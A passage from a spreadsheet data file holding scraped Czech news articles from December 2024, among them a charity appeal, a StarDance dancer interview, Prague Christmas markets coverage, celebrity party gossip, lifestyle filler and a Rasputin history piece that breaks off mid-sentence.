3. stupně, je ochrnutý na levou stranu. Ta péče je opravdu na 24 hodin denně, takže jsem neměl na výběr. Stal jsem se opatrovníkem.“ „Radost by nám udělaly nové spotřebiče, které by mi usnadnily péči o Páju. Potřebovali bychom sporák a sušičku. Potřeba by byl také gauč. Na současném, který není rozkládací, spím, abych byl poblíž. Pája by chtěl novou televizi a počítač.“ Andrejka (4) po mozkové obrně Malá Andrejka Radová (4) kvůli šedému zákalu a mozkové obrně špatně vidí, nechodí a nemluví. VYBÍRÁME 144 TISÍC „Můj táta je z dvojčat. Tvrdil, že je budu mít určitě také, a to se vyplnilo,“ vzpomíná maminka Tereza Škodová (29). Rodiče se na Andrejku a jejího brášku Patrika moc těšili. Třetí den po porodu ale Andrejce lékaři zjistili na obou očích šedý zákal, podstoupila dvě operace. Nejtěžší rána na rodinu ale teprve čekala. Zatímco bráška Patrik se už plazil po břiše, dcerka jen nehybně ležela. Neurologické vyšetření dcery ukázalo poškození mozku, spastickou triparézu, má postižení obou dolních a jedné horní končetiny. A jak na tom teď Andrejka je? „Velmi dobře všemu rozumí. Máme mezi sebou domluvených pár znaků a tak komunikujeme. Moc bych od ní ale chtěla slyšet nějaké to slovo...“ Aby měla Andrejka naději, že se její stav zlepší, musí absolvovat nákladné rehabilitace. A cílem sbírky je právě zajistit peníze na dvě dvoutýdenní komplexní neurorehabilitační terapie Therasuit na rok 2025. JAK PŘISPĚT? Pokud vás příběhy zaujaly, přispějte a společně uděláme malý velký zázrak. Jak? Blesk spolu s Doniem (což je sbírková platforma pro všechny, kteří chtějí změnit svůj nebo něčí životní příběh) pro projekt Zázrak Blesku vytvořil sbírku. Příběhy a návod, jak přispět, najdete konkrétně na donio.cz/zazrakblesku donio.cz/zazrakblesku Dostanete se k nim také přes tento QR kód. Rubrika transition_slide TÉMA</t>
  </si>
  <si>
    <t>20241201_301_3475605729_8655b6f3d342695fc9ad.html</t>
  </si>
  <si>
    <t>8655b6f3d342695fc9ad</t>
  </si>
  <si>
    <t>MARTU JE TĚŽKÉ UKOČÍROVAT</t>
  </si>
  <si>
    <t>MARTU JE TĚŽKÉ UKOČÍROVAT Rubrika: ROZHOVOR Tanečník a účastník reality show Survivor Martin Prágr (30): S Gabrielou Soukalovou (35) se v roce 2019 umístil ve StarDance na 5. místě, o dva roky později ho se Simonou Babčákovou (51) vyřadil covid, loni s Ivou Kubelkovou (47) bral bramborovou medaili. Letos Martin Prágr (30) tančí s Martou Dancingerovou (33). S Martou patříte mezi favority, narazil jste už na nějaké její limity? „Favorité? Tato soutěž je tak nevyzpytatelná, že si to nepřipouštíme. A limity se snažím hledat u každého tanečního partnera, abychom zatancovali, jak nejlépe to jen jde. U Marty asi nelze říct nějaký konkrétní, který bych vypíchl. Každopádně daleko víc jí jde latina než standard. Tím, že je hodně energická, byl občas problém ji ve standardních tancích ukočírovat.“ V čem tkví tajemství, že je Marta tak dobrá? „Je velmi precizní, chce věci dotahovat do konce jak na parketě, tak v herectví. Neřekl bych, že je na sebe tvrdá a naprosto se tím oddělávala, ale cítím, že si doma dělá přípravu, projde si video, udělá rozbor choreografie, dá si to v klidu sama dohromady. Druhý den přijde a já vidím, jak pokročila.“ Hádáte se někdy při trénincích? „To vůbec. My jsme si hned na začátku řekli, že tohle člověk prožívá jednou za život a není třeba si to kazit hádkami kvůli tomu, že je to nazvané jako soutěž a musíme vyhrát.“ Znal jste Martu z televize? „Věděl jsem, že je výborná herečka a že byla v Kukačkách, Labuti, ale neviděl jsem nic z toho. Ani na divadle jsem ji neviděl hrát. Byla mě akorát provést Činoherním klubem, kde má angažmá, ukázala mi, jak to tam funguje. Ale tréninky jsou teď tak náročné, že ani ona tolik nehraje, takže nebyla příležitost jít se na ni podívat.“ Znáte se i s jejím partnerem? „Ano, jak on, tak moje partnerka chodí na přenosy, její syn zase na generálky.“ Žárlí na Martu ? Bavili jste se o tom? „Člověk jde do této soutěže s tím, že bude trávit nějaký čas s tím druhým. Navíc v jejich branži jsou zvyklí, že tráví čas s někým dalším na prknech nebo place, takže si myslím, že od partnera má Marta maximální podporu.“ Říkal jste v přenosu, že se vám líbí její výchova syna. V čem dalším vás inspiruje? „Líbí se mi, jak se synem dokáže komunikovat a nacítit se na něj. Jsou kamarádi, ale zároveň je pro něho autoritou. A jinak mě inspiruje tím, jak je extrémně pracovitá. Vstává brzy ráno, řeší syna, pak tréninky, kolikrát ještě hraje a vrací se domů večer… Klobouk dolů.“ A je něco, co vám na ní naopak vadí? „Na nic takového jsem nenarazil. Ona je naprosto pozitivní člověk.“ Ze všech tanečnic, které jste ve StarDance měl, je vám Marta věkově nejblíže. Je to znát? „Musím zaklepat, že se všemi svými tanečnicemi jsem si sednul a vždycky jsme našli společný smysl pro humor. Ale ano, Marta je mi nejblíže takovou tou »pubertou«, je fakt pro každou srandu.“ Téměř hned poté, co jste loni skončil ve StarDance, jste odletěl do Dominikánské republiky soutěžit »o přežití« v reality show Survivor. Připravoval jste se nějak? „Vůbec, na to nebyl ve StarDance čas. S křesadlem jsem se učil až na ostrově, což bych budoucím účastníkům nedoporučoval.“ Jak se liší tlak na soutěžícího v Survivoru od tlaku na tanečníka ve StarDance? „Je to naprosto nesrovnatelné. V Survivoru žijete bez jídla, spánku, jste neustále pod psychickým tlakem, zůstáváte na malém uzavřeném území s lidmi, které pořádně neznáte. Díky Survivoru jsem shodil určitou povrchnost. Dříve jsem třeba řešil, že není v cateringu zrovna to, co chci, nebo že jsem se příliš nevyspal. Přitom jsem spal v posteli a aspoň šest hodin. Teď když se mi něco takového stane, řeknu si, že o nic nejde.“ Proč jste do této soutěže šel? „Byl jsem osloven a po šesti letech na parketě v televizi jsem chtěl prožít a zkusit něco odlišného. Očekával jsem, že mi to ukáže jiný pohled na život a mé hranice.“ A ukázalo? „Určitě. Jdete tam s tím, že dostanete rýmu a naprosto se sesypete. A pak jste na ostrově, dostanete zápal plic a zánět ledvin a musíte to nějak přežít. Člověk si daleko víc začne vážit svého těla, jídla, přátel, rodiny. Jsme neustále pod tlakem, že máme někomu něco dokazovat, a zapomínáme na základní hezké okamžiky.“ Co pro vás bylo na ostrově nejtěžší? „Asi ta sociální hra, kdy nevíte, kdo na vás co vybalí. A pak odcizení od rodiny, přítelkyně, přátel…“ Loni na podzim jste mi v rozhovoru tvrdil, že jste single, ale teď říkáte, že se vám stýskalo po přítelkyni… „Byli jsme spolu teprve krátce a nechtěl jsem to ještě říkat. O to těžší pro nás bylo, že jsem téměř na začátku vztahu odletěl na několik týdnů pryč. Ale byla to dobrá zkouška, vydrželi jsme.“ Jaký byl návrat na parket? Mnoho účastníků Survivoru se dost dlouho zdravotně vzpamatovává. „Dát se dohromady bylo náročné. Shodil jsem 12 kilo, pak jsem spíš přibral tuk než svaly, takže začátek StarDance byl pro mě letos těžký. Do toho ještě často jezdím na Moravu , kde rekonstruuju sklípek. Ale už se tělo zase začíná dávat do pořádku.“ Sklípek vám odkázali prarodiče, v jaké jste fázi? „Už mám hrubou stavbu, střechu, okna, dodělává se fasáda a s interiérovou designérkou dávám dohromady vnitřek.“ Je reálné, že byste začal vinařit? „Ano. Asi bych se nestěhoval na Moravu , aspoň zatím ne, ale je reálné, že bych s někým spolupracoval a prodával víno pod nějakou svou značkou.“ Máte vinice i v rodině? „Máme, ale ty má na starosti můj brácha.“ Takže spolupráce s bratrem? „Všechno je možné, nechávám to otevřené.“ Přítelkyně by byla pro, aby se z vás stal vinař? „Je to kouzelné místo, které si zamiluje každý. Někdo cestuje do Itálie na vinice, my budeme jezdit na Moravu .“ A to plánujete, že byste s tancem skončil úplně? „Jednou mě to čeká, v padesáti už asi tancovat nechci. Vystoupení se dají dělat třeba do 38 let, pak už mi to přijde zvláštní. A porotcování mě nebaví. Takže pak se vrhnu na vinaření a rodinu.“ Děti jsou v plánu? „Tak padla mi třicítka a pociťuju, že jsem se dostal do dekády, kdy už je na děti čas. A já rodinu určitě chci.“ Třicátiny jste měl 18. 10. Jak jste je oslavil? „Rodina, přátelé a přítelkyně mi po druhém přenosu nachystali tajnou oslavu. Vůbec jsem nic netušil, takže když jsem viděl celou tu skupinku z Moravy a z Prahy pohromadě, tak jsem nevěřil vlastním očím. Na oslavě byla i Iva Kubelková se Simonou Babčákovou . Bylo to moc fajn!“ S Gabrielou Soukalovou (tehdy ještě Koukalovou ) si sedli natolik, že se spekulovalo o jejich milostném poměru. Ten však oba jasně vyvrátili. Se Simonou Babčákovou je vyřadil ze soutěže covid. Iva Kubelková je dle slov Martina Prágra velký perfekcionista. A na jejím výkonu to bylo znát. S tancem začal v sedmi letech. JIž více než rok je šťastný po boku přítelkyně Anety. S Denisou Galandžárovou vyhráli mistrovství České republiky v kategorii mládež, vicemistři kategorie do 21 let. Společně soutěžili taktéž na mistrovství Evropy v Moskvě a Stuttgartu či na mistrovství světa na Mallorcce. „ Marta je pro každou srandu,“ pochvaluje si tanečník. „A také je velmi energetická,“ dodává. „Je velmi precizní a věci dotahuje do konce,“ chválí herečku tanečník... „Klíčové pro vytvoření správné chemie mezi tanečním párem na parketu je hned na startu se dobře navnímat – kdo jaký je, jak funguje, co mu jde a co ne. A pak si být hlavně vzájemně psychickou oporou,“ myslí si Martin Prágr. Na začátku letošního roku předvedl svou fyzickou i psychickou zdatnost v reality show Survivor. Profesionální soutěžní kariéru již pověsil na hřebík a není vyloučeno, že za pár let bude z Martina Prágra vinař. Autor: Text: Bára Veverková Foto: ČT Autor person Bára Veverková Rubrika transition_slide ROZHOVOR</t>
  </si>
  <si>
    <t>20241201_302_3475594308_800f974f879bc13335a2.html</t>
  </si>
  <si>
    <t>800f974f879bc13335a2</t>
  </si>
  <si>
    <t>takhle září 110 tisíc žárovek</t>
  </si>
  <si>
    <t>takhle září 110 tisíc žárovek Vánoční trhy na Staromáku odstartovaly PRAHA – Jedny z nejkrásnějších vánočních trhů světa slavnostně začaly! Na Staroměstském náměstí v Praze se včera rozzářilo všech 110 890 žárovek na 20metrovém smrku. Byť se otevřely již včera ráno, trhy pomyslně odstartovala v 16:30 premiéra animace stromu za tónů Smetanovy symfonické básně Vltava z cyklu Má vlast. Kdo ji prošvihl, nemusí litovat. „Hosté ji mohou vidět každý den vždy v půl od 16:30 do 21:30 hodin,“ řekla mluvčí Hana Tietze za firmu Taiko . Letošní trhy, které americká televize CNN označila za třetí nejkrásnější na světě, se nesou v duchu českých tradic a obešly se bez kýčovitých světelných efektů. „Strom jsme ozdobili více než dvanácti kilometry teple bílého osvětlení s bílými motivy – zimními vločkami – a rozsvítilo se na něm 110 890 LED diodových žárovek,“ řekla Eva Poláčková ze společnosti Decoled . Strom zdobí navíc i 50 sněhových vloček a 340 koulí ze skla v barvách hlavního města – červené a žluté. Trhy jsou otevřeny každý den od 10 do 22 hodin. Ceny vzrostly oproti loňsku minimálně, svařák zdražil o desetikorunu na 100 Kč za dvě deci, klobása stojí stejně jako loni 150 Kč. Na 12kilometrovém řetězu svítí přes 110 tisíc světel. Slavnostnímu rozsvícení přihlížely tisíce lidí. Vánoční trhy vykouzlily úsměv na nejedné dětské tváři. Most uprostřed trhů nabízí dokonalý výhled na strom. Strom je osazen i skleněnými koulemi a zářícími vločkami. Zavoní perníčky i svařák 82 stánků vyzdobených ve zlaté, stříbrné a červené nabízí především zboží z Česka . Nechybí tradiční vánoční ozdoby, výtvory uměleckého kováře nebo dřevěné hračky. Mlsné jazýčky potěší nejen klobásy, perníčky a palačinky, ale i bramborový salát s kaviárem. Zahřát se můžete svařeným vínem , které je letos výhradně z moravských hroznů, punčem nebo medovinou. Nechybí ani zdobené perníčky. Autor: Text: Matouš Voldřich Foto: David Malík Autor person Matouš Voldřich</t>
  </si>
  <si>
    <t>20241201_303_3475550456_d0740ebb662496b29018.html</t>
  </si>
  <si>
    <t>d0740ebb662496b29018</t>
  </si>
  <si>
    <t>Teď královnou jsem já!</t>
  </si>
  <si>
    <t>Teď královnou jsem já! Rubrika: AKTUALITY Rozjetá Bronzová slavice Monika Absol onová Když kamery na Slavíkovi zhasly... začal mejdan PRAHA – Po pátečním přenosu Českého slavíka následovala tradiční afterpárty ve Foru Karlín i druhá, tradičně utajená, pařba. Zatímco někteří zůstali v Karlíně , jiní se na mejdan ve velkém stylu přesunuli o pár ulic dál! 30. 11. 2024 0:48 – 3:15 hod. Praha - Karlín Nakvašený Jágr Mráčky v ráji? V nepříliš dobré náladě dorazil Jaromír Jágr (52). Dokonce se zdálo, že se dostal do sporu s přítelkyní Dominikou Branišovou (30), se kterou se na sebe nejdřív mračili... Byla to ale asi jen přeháňka, protože při nástupu do taxi v půl čtvrté ráno už byli samý úsměv. Jágr si s Dominikou cosi vyříkával. Odjížděli až k ránu. Tancující Absolonová Hned po skončení přímého přenosu se hvězdná partička vydala do nedalekého podniku. Nechyběl Ondřej (41) a Daniela (45) Brzobohatí , herečky Hana Vagnerová (41) a Petra Nesvačilová (38), hudebník Michal David (64), moderátor Aleš Háma (51) nebo zpěvačka Bára Basiková (61). Soukromému večírku kralovala Monika Absolonová (48), která svého Bronzového slavíka oslavila zpěvem i tancem. Bylo na ní vidět, že má z ocenění obrovskou radost. Monika Absolonová se rozjela. Ztratila boty? Jako vítr v bedně se při odchodu motal večírkový král Leo Beránek st. (67) s manželkou Kačenkou (24), která zřejmě ztratila boty. Usadil ji do taxíku, a než stihl nastoupit, řidič se rozjel! Beránek tak málem zůstal stát na silnici! Beránek měl poněkud vratký krok. Leo Beránek vášnivě líbal manželku. Zastavil se i Michal David . Aleši Hámovi bylo do skoku. Bára Basiková pokuřovala. Ondřej Brzobohatý dováděl s Danielou. Hudebník si povykládal i s Petrou Nesvačilovou . Agáta neodešla po svých! Hanychová v náručí Nezdrželi se dlouhou. Na afterpárty ve Foru Karlín si Agáta Hanychová (39) s manželem Mirkem Dopitou (40) pochutnali na řízku a zmizeli. Dopita se ukázal jako gentleman, protože svou paní v náručí donesl až do auta. Na vině ale nebyl alkohol , ale Agátiny vysoké podpatky. Mirek Dopita si nese Agátu . Lucie Bílá Anna K. na velké mejdany není. Milan Peroutka Jana Bernášková a Martin Hranáč. Autor: Text: M. Janíček, D. Turek Foto: M. Pátek, M. Hykl, D. Kundrát, P. Machan Autoři person D. Turek person M. Janíček Rubrika transition_slide AKTUALITY</t>
  </si>
  <si>
    <t>20241201_304_3475550458_3aaf97d01513828a5d37.html</t>
  </si>
  <si>
    <t>3aaf97d01513828a5d37</t>
  </si>
  <si>
    <t>Střípky ze Slavíků</t>
  </si>
  <si>
    <t>Střípky ze Slavíků Bernášková po rozchodu: Přišla s chlapem! Nedávno herečka Jana Bernášková (43) oznámila, že s manželem, scenáristou Rudolfem Merknerem (52), už netvoří pár. Na Slavíky však přišla s pánským doprovodem. Fešák vedle ní byl influencer a někdejší soutěžící v reality show VyVolení Martin Hranáč (40). Žádné vzplanutí však nehrozí, protože Hranáč je gay. Peroutka vynesl šperky za miliony Móda je v poslední době vášní Milana Peroutky (34). To dokázal i na Slavících, kde se rozhodně nedržel zkrátka. Oblek měl od návrhářky Tatiany Kováříkové (57). Šperky v ceně cca 3 miliony Kč měl zapůjčené od značky Halada a ALO. Lucie Bílá neunesla prohru? Pro Stříbrného slavíka v kategorii zpěvačka si přišla Lucie Bílá (58). I když to přímo nezmínila, bylo na ní znát, že s umístěním není tak úplně spokojená. Po přenosu dala jeden rychlý rozhovor a okamžitě se vytratila zadním vchodem. Anna K. si zakázala alkohol Poprvé od rozchodu s Tomášem Varteckým (54) se ve větší společnosti objevila zpěvačka Anna K. (59). „Nemám kapacitu na pařbu. Nepiju alkohol , takže až to skončí, tak mažu,“ řekla Blesku před začátkem slavnostního večera.</t>
  </si>
  <si>
    <t>20241201_305_3473930919_c9a3d552a671218918a5.html</t>
  </si>
  <si>
    <t>c9a3d552a671218918a5</t>
  </si>
  <si>
    <t>Opuštění známého světa: Jak karavanisté objevují Rawenský kraj jako skrytou perlu</t>
  </si>
  <si>
    <t>Opuštění známého světa: Jak karavanisté objevují Rawenský kraj jako skrytou perlu 01.12.2024 Redakce Karavanování se v posledních letech stalo stále populárnější alternativou k tradičnímu cestování. Mezi milovníky přírody a dobrodružství není překvapením, že právě Rawenský kraj si získává pozornost svých obyvatel i návštěvníků. Možná jste o něm dosud neslyšeli, ale tato malebná oblast s bohatou historií a přírodními krásami je jako stvořená pro objevování. V našem článku se podíváme na to, proč by Rawenský kraj měl být na vašem cestovatelském seznamu a jaký zážitek vám může nabídnout. Nečekané přírodní krásy Pohybovat se po Rawenském kraji vozem na pobyt je jako procházet se kouzelnou krajinou fantazie. Krajina je posetá malebnými vesničkami, lesními stezkami a historickými památkami. Místní příroda, s rozmanitými druhy rostlin a živočichů, dává prostor pro fascinující procházky a cyklistické výlety. Mnozí návštěvníci si nevšimnou, že Rawenský kraj má více než 1 000 kilometrů značených cyklostezek, což je více než mnohá známější turistická střediska. Tento region vám umožní stát se součástí přírody a zároveň zůstat ve svém vlastním karavanu. Velkým překvapením pro karavanisty je, že ve Rawenském kraji najdete i místa pro kempování, která nabízejí moderní zázemí a pohodlí pro obytná vozidla. Mnohé kempy disponují elektřinou, vodou a dalšími službami, které vám usnadní pobyt. Přestože se tato oblast nachází relativně daleko od rušných turistických tras, právě to ji činí zvláštním místem pro ty, kteří touží po klidu a pohodě. Historie a kultura na dosah ruky Rawenský kraj však nenabízí pouze přírodní krásy. Historie této oblasti je bohatá a rozmanitá, což dokládají četné památky a tradice. Například, v malých městech a obcích můžete nalézt zachovalé středověké kostely, které vyprávějí příběhy o dávných dobách. Spousta karavanistů si oblíbila místní trhy, kde mohou ochutnat tradiční speciality a nakoupit rukodělné výrobky. Lokální populace je velmi přátelská a ráda se podělí o své historie, což z návštěvy udělá nezapomenutelný zážitek. Další zajímavostí je, že Rawenský kraj je domovem neuvěřitelných lidových tradic, jako je každoroční slavnost ochutnávání vín a regionálních specialit. Pro milovníky vína a gastronomie je to zkušenost, kterou si nemohou nechat ujít. Tento festival ukazuje nejen kvalitu místních produktů, ale také spojení komunity a četné rodinné podniky, které se za nimi skrývají. Ideální místo pro všechny karavanisty Pokud patříte mezi nadšené karavanisty, Rawenský kraj vám nabídne mnoho možností k naplnění vašeho úsilí a rozvoji. Vydejte se na cestu z pohodlí vašeho obytného auta a objevujte místní krásy, ať už jde o přírodní, historické nebo kulinářské zážitky. S podporou moderních kempovacích služeb se můžete soustředit pouze na své dobrodružství a na to, co vše můžete prozkoumat. Na závěr je Rawenský kraj místem, které si zaslouží pozornost těch, kteří hledají unikátní zkušenosti daleko od rušného městského života a turistických mas. Takže pokud plánujete další cestu, neváhejte zaparkovat své obytné vozidlo kousek od těchto neobjevovaných přírodních a kulturních pokladů. Čeká na vás nejedno překvapení a nezapomenutelný zážitek. Autor: Redakce Rubrika transition_slide Recenze</t>
  </si>
  <si>
    <t>20241201_306_3473908869_c13230724168c917f024.html</t>
  </si>
  <si>
    <t>c13230724168c917f024</t>
  </si>
  <si>
    <t>Proč se vyplatí postavit v obýváku barevnou zeď a jak to změní váš život</t>
  </si>
  <si>
    <t>Proč se vyplatí postavit v obýváku barevnou zeď a jak to změní váš život autor: Redakce Nezdrave.cz | 01.12.2024 | Lifestyl Pojďme si na chvilku promluvit o barvách a jejich síle. Víte, že správná volba odstínu na zdi může změnit nejen atmosféru vašeho obýváku, ale i náladu během dlouhého pracovního dne? Dnes se zaměříme na to, jak barvy ovlivňují naše emoce a jak se můžete prostřednictvím jednoduchého nátěru dostat na úplně novou úroveň vnímání reality. Takže, pánové, pokud váš interiér vypadá jako otřesná postel Máchova jezera, čas na změnu je právě tady. Emoce jsou barvy Možná si říkáte, co na takovém malování může být tak zajímavého. Ale věřte mi, barvy mají cizí magii. Když si vezmete například žlutou, ihned pocítíte, jak se vám na tváři objeví úsměv. Je to prý barva slunce a štěstí, a to je přesně to, co chcete, když se s kámoši sejdete na pivu . Naopak, modrá klidně může vyvolat vzpomínky na ledový zimní večer, kdy jste zapomněli zaplatit za energie. Takže, než se pustíte do natírání, důkladně přemýšlejte o tom, co chcete vyjádřit. Když se rozhodnete osvěžit váš soft shell obývák, tak místo standardu bílé nebo béžové, zvolte raději nějakou trendy barvu. Ať už je to smaragdově zelená, baby pink nebo klidně i flamboyantní fialová, efekt bude elektrizující. Nejen, že okopáváte kedlubny Facebookových minimalistů, ale i dáváte jasně najevo, že jste člověk s názorem a stylem. Navíc, jak ukazují studie, lidé obklopení jasnými barvami se cítí šťastněji. Co jiného potřebujete? Kreativita na dosah ruky Říkáte si, že malování patří do dní, kdy na to máte náladu? No, fakticky to není pravda. Představte si, jak ji zase jednou hodíte na plátno. Malování totiž může podpořit vaši kreativitu, a nejen tejně. Zjistilo se, že lidé, kteří se obklopují barvami, jsou méně vystresovaní a otevřenější novým nápadům. Takže pokud plánujete zásadní prezentaci nebo revizi pracovního projektu, zkuste si na chvíli postavit paletku v obýváku. Věřte mi, ten nový odstín „chci užít život“ vám dodá na potřebné inspiraci. Pokud si říkáte, že už jste odrostli na sezónní trendy a že barvy jsou pro děti, zamyslete se nad tím znovu. Protřepaný humorový magazín jasně ukazuje, že víc než prázdné jmenovky a kloboučky na pizzu, hraje roli prostředí, ve kterém se pohybujete. Představte si, jak si večer v takhle vyladěném prostoru vychutnáváte drink s přáteli nebo se prostě díváte na film. Každý detail hraje svoji roli v tom, jak se cítíte a co si pamatujete. Je to víc, než jen kousek barvy na zdi. Vytvořením výjimečného prostoru, řekněme, na hranici bizarnosti, si vzbudíte zvědavost i u nejednoho návštěvníka. Zatímco on, nebo ona, hledá čtyřicet minut neexistující květinový vzor ve vaší tkanině, vám se bude v hlavě rodit šílený koncept pro novou startupovou aplikaci. Možná budete schopni vymyslet, jak naprogramovat robota, kterého budete nenápadně učit, jak navrhovat další stěny. V podstatě tak uděláte ze svého obýváku nejen prostor pro relaxaci, ale i vlastní laboratoř kreativních nápadů. A příště, až pocítíte nutkání chytit malířský štětec, uvědomte si, že to není jen o barvě, ale o tom, jak reálně ovlivňujete svůj život a životy těch kolem vás. Koneckonců, kdo by nechtěl mít domov, který je tak živý, že se mu bude chtít tancovat i na umělém trávníku? Každé gesto má svůj význam a tak buďte tím, kdo v klidné noci na šampaňské zvládne brilantní umělecké dílo, které potěší každého návštěvníka. Ať už je váš obývák jakýkoliv, pamatujte, barvy nejsou jen vizuální stimulace, ale zlatá vstupenka do vaší kreativní duše. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241201_307_3479296049_3291a5a4569dc4420948.html</t>
  </si>
  <si>
    <t>3291a5a4569dc4420948</t>
  </si>
  <si>
    <t>Nemrznoucí směsi do ostřikovačů pod drobnohledem</t>
  </si>
  <si>
    <t>Nemrznoucí směsi do ostřikovačů pod drobnohledem Prosinec, 2024 Zimní, nemrznoucí směsi do ostřikovačů jsou co do složení pravděpodobně tou nejkonzervativnější provozní kapalinou vůbec. Na kombinaci alkoholu , vody, povrchově aktivní látky (tenzidu), parfému a barvy se nezměnilo za poslední desetiletí vůbec nic. Přesto není od věci se ve spolupráci s Janem Skolilem, CTO ve společnosti CLASSIC OIL , podívat, na co si u nich dát pozor. Čas od času se v médiích objeví zaručený recept, jak má spotřebitel ušetřit a nemrznoucí směsi do ostřikovačů na přední sklo auta si vyrobit sám – svépomocí. Čistou vodu máme k dispozici každý, čisticí prostředek typu jaru také a použití barviva a parfému nakonec není nezbytné. Zbývá už jen ten největší oříšek – alkohol – tedy etanol (líh). K izopropylalkoholu či metanolu (dřevnímu lihu) se většina z nás nedostane, zatímco etanolu je v našem okolí spousta. Jde veskrze o potravinářský líh a ten je bohužel pro toto zamýšlené využití zatížen spotřební daní. Ta činí 285 Kč za 1 litr absolutního alkoholu . Na přední sklo sice k rozmrazení stačí koncentrace blízká běžným konzumním lihovinám – 40 % – ale i tady činí zbylých 114 Kč daně takové využití potravinářského alkoholu naprosto nerentabilní. Pro ekonomickou výrobu nemrznoucí směsi je praktičtější technický líh zdenaturovaný kombinací chemických látek, které zajistí, že takový alkohol nikdo nepožije, a tudíž nemusí být ošetřen spotřební daní. Litr takového etanolu se dá při cisternovém odběru pořídit již od třiceti korun. Ukončíme tedy pro jednou teorii podomácké výroby a přenecháme ji profesionálům. Zápach I v odborném tisku se lze občas setkat s nesmyslnou informací, že za senzorickou nelibost kapalin do ostřikovačů může metanol. Ten je v tom naprosto nevinně, je sice toxický, ale rozhodně nesmrdí. Za nepříjemný zápach jsou zde odpovědné tři jiné faktory: nekvalitní líh, nevhodná denaturace anebo parfém. Ta první varianta je určitě tou nejčastější, zde totiž platí přímá úměra: čím levnější alkohol , tím vyšší pravděpodobnost obsahu úkapů a dokapů – tedy zápachu obecně. Někdy se k tomu přidá nevhodná nebo vysoká koncentrace denaturačních složek. V Evropě již osm let platí jednotná evropská denaturace ve složení Bitrex (zhořčující přísada), izopropylalkohol a metyletylketon. Pokud Vás článek zaujal a přejete si pokračovat v jeho přečtení, přihlaste se. Tento článek je přístupný pouze pro předplatitele Koupit předplatné Máte už předplatné? Přihlásit se. Další články Autor: Jan Skolil Autor person Jan Skolil</t>
  </si>
  <si>
    <t>20241201_308_3473821267_3fac27f41a1ccc51270f.html</t>
  </si>
  <si>
    <t>3fac27f41a1ccc51270f</t>
  </si>
  <si>
    <t>Křest zinu Divoká Šárka</t>
  </si>
  <si>
    <t>Křest zinu Divoká Šárka Jeronýmova 88/9, 130 00 Praha 3 – Žižkov otevřeno dle akcí +420 732 464 434 info@iniproject.org http://www.iniproject.org Zveme na křest zinu Divoká Šárka, který je závěrečnou událostí tohoto projektu v INI Prostoru. Zine v grafické úpravě Matúše Buranovského se dotýká otázek práv přírody, samozásobitelství, agroekologie, commons a dalších více-než lidských aliancí. Na jeho stránkách najdete rozhovory, příběhy rostlin, mapy lokalit, recept na výrobu divokého piva , text modlitby pro sběrače a mnoho jiného. Přečtete si, jak více-než lidský svět vnímají Tomáš Uhnák, Bob Kuřík, Lucia Bergamaschi, Klaas Kuitenbrouwer nebo se nechte za nos táhnout do světa lesních kulinářských vůní s Lenkou Kubelovou. Program: – křest zinu Divoká Šárka; – online představení nizozemského projektu Zoöp v přednášce Klaase Kuitenbrouwera. Zoöp je organizační model spolupráce mezi různými formami života, který začleňuje jejich zájmy do rozhodovacích procesů; – šestichodová degustace inspirovaná pověstí Dívčích válek zaměřená na feminizaci přírody, reprodukční a více-než lidskou práci, připravená umělkyní Zuzanou-Markétou Mackovou ; – ochutnávka divokých piv a kefírů z plodů Divoké Šárky vzniklé pod vedením Lenky Kubelové; – hudební vystoupení sorbitol drops kombinující terénní a studiové nahrávky přírodních materiálů a nástrojů do nečekaných koláží plných tenze.</t>
  </si>
  <si>
    <t>2260</t>
  </si>
  <si>
    <t>20241201_309_3473748591_555197fe47b0714fda79.html</t>
  </si>
  <si>
    <t>555197fe47b0714fda79</t>
  </si>
  <si>
    <t>Rasputin, opilec a léčitel, který předpověděl konec carského Ruska</t>
  </si>
  <si>
    <t>Rasputin , opilec a léčitel, který předpověděl konec carského Ruska Rasputin tvrdil, že pokud bude žít, bude žít i vládnoucí dynastie Romanovců. Pro carevnu byl mystikem a léčitelem seslaným od Boha. Pro většinu ostatních šarlatán seslaný ďáblem. Grigorij Jefimovič Rasputin , opilec, mnich a léčitel, který předpověděl konec carského Ruska a smrt celé rodiny cara Mikuláše II. Bobby Farrell , frontman kdysi dávno populární skupiny Boney M., odzpíval svůj poslední koncert. Na něm zazněla mimo jiné i velice populární píseň Rasputin . Po večeři odešel do svého pokoje, kde byl druhý den ráno nalezen mrtev. Stalo se to v ruském Petrohradě 30. prosince 2010. Postava, o které Farrell zpíval, Gríša Rasputin, zemřel v témže městě také 30. prosince. Pouze rok byl jiný. 1916. A způsob, jakým zemřel. „Oh, those Russians.“ Grigorij Jefimovič Rasputin tvrdil, že pokud bude žít, bude žít i vládnoucí dynastie Romanovců. Jeho kariérní dráha neměla ve světě obdoby. Z potulného sibiřského kazatele a alkoholika se za pár let stal nejbližším poradcem cara Mikuláše II. Pro carevnu byl mystikem a léčitelem seslaným od Boha. Pro většinu ostatních šarlatán seslaný ďáblem. Přesto, že se v mládí oženil a jeho žena mu porodila tři děti, nemanželské se nepočítají, rozhodl se odejít. Nějak se dozvěděl, že je Bohem vyvolený a má schopnosti léčit lidi. A světe div se, léčil. Putoval po matičce Rusi a ještě dál. Údajně i do Řecka a do Jeruzaléma . A v roce 1903 se objevil daleko na severu, v Petrohradě . Měl zjevení, že carská rodina potřebuje jeho pomoc. Kdo by nepomohl. A stal se zázrak. Rasputinovi se podařilo zastavit krvácení tříletého následníka trůnu Alexeje. Rodiče před světem tajili synovu hemofilii a po zákroku Rasputina se chlapcův stav stabilizoval. Od té chvíle se stal nejen dvorním lékařem mladého careviče, ale také rádcem, poradcem a miláčkem dvorních dam. Ovlivňoval rozhodování ve státních záležitostech, pletl se do armády i do osudů jednotlivých lidí. Dámy z nejvyšších kruhů si u něj podávaly dveře a Rasputin vyhověl všem. A ve všem. Diskreditace carské rodiny i samotného úřadu dostoupila vrcholu. Věčně opilý mužík s rozcuchaným plnovousem v zapáchajících hadrech, který si omotal cara i carevnu kolem prstu, byl trnem v oku mnohým šlechtickým rodinám, které měly dříve přístup ke dvoru. Spiklenci vedení knížetem Felixem Jusupovem si jako den „D“ vybrali noc na 31. prosince roku 1916. Pozdě večer 30. prosince se dostavil Rasputin do paláce k večeři. Otrávené koláče a víno , které svému hostu nabídli, nezabraly. Hostitelé znervózněli a kníže tedy střelil svým browningem Rasputina do hrudi. Když odnášeli nehybné tělo, Rasputin otevřel oči a zázračně ožil. Dokonce se pustil se svými vrahy do krátkého a nerovného zápasu. Když se doplazil na nádvoří, carův synovec, velkokníže Pavlovič po něm několikrát vystřelil. Tělo poté zabalili do kožichu a 